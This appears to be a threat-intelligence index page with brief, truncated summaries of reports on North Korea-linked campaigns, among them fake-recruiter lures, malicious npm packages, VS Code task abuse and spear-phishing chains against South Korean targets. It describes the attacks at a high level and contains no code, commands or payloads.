387 reports
Darktrace observed a South Korea-focused campaign aligned with DPRK activity that used a JSE file disguised as an HWPX document and government-themed decoys impersonating the Ministry of Personnel Management. The script ran through Windows Script Host, un…
Recorded Future’s Insikt Group links PurpleBravo to North Korea’s Contagious Interview activity targeting software developers, especially in software development and cryptocurrency-related roles. The campaign uses fraudulent LinkedIn personas, fake recrui…
Kimsuky is described using malicious QR codes in spearphishing emails to move victims from managed desktops to less-protected mobile devices and evade URL inspection and sandboxing. The campaign targets think tanks, academic institutions, government-relat…
Hauri describes phishing emails that impersonate Secure Drive authentication and lure recipients into manually running malware attached to a message abusing the identity of a high-ranking public official. The malware relies on social engineering, obfuscat…
BlueNoroff is presented as the financially motivated arm of Lazarus, evolving from SWIFT and bank intrusions such as the Bangladesh Central Bank heist into sustained cryptocurrency and Web3 targeting. The excerpt traces campaigns including SnatchCrypto, f…
DPRK-attributed Contagious Interview operators are using fake recruitment and code-review projects to target software developers through GitHub-hosted repositories. The infection vector abuses Visual Studio Code workspace tasks, especially .vscode/tasks.j…
OpenSourceMalware traced the malicious npm package tailwindcss-forms-kit to the DPRK-linked Contagious Interview campaign, where fake recruiters target software engineers in cryptocurrency, Web3, and blockchain roles. The package masqueraded as a Tailwind…
Jamf Threat Labs describes an evolution of the DPRK-linked Contagious Interview campaign that abuses Microsoft Visual Studio Code task configuration files in malicious GitHub or GitLab repositories. Under recruitment or technical-assignment lures, a victi…
A malicious npm package named bigmathix impersonated the legitimate big.js library and introduced malicious version 1.0.2 after two benign releases and more than 20 days of dwell time. The package, published by jacksonroman338, used an obfuscated multi-st…
North Korean state-sponsored groups are described as expanding hybrid intrusion models that combine fake IT employment schemes, remote-work abuse, and malware delivery changes. Famous Chollima targeted U.S. and Western companies through fraudulent remote …
AhnLab’s December APT trends describe North Korean state-backed groups increasingly using fake IT employment schemes, legitimate hiring platforms, fabricated identities, and remote-work infrastructure to enter corporate environments. Famous Chollima targe…
Genians attributes Operation Poseidon to Konni APT and details a targeted phishing chain against South Korean financial and North Korean human rights-related lures. The actor used legitimate advertising redirect structures, especially ad.doubleclick[.]net…
Genians attributes Operation Poseidon to the Konni APT and describes spear-phishing activity that impersonated South Korean financial institutions and North Korean human rights organizations. The campaign used Google Ads and earlier NAVER ad-click redirec…
NSHC observed SectorA activity during December 2025 involving credential theft, remote access, and financially motivated targeting of finance, technology, and government environments. The DPRK-linked section highlights LummaC2 and OtterCookie use, WinRAR …
AhnLab’s December 2025 South Korea APT telemetry found spear phishing as the dominant delivery method, with LNK-based attacks accounting for the largest share of observed activity. The LNK chains executed malicious PowerShell commands to download payloads…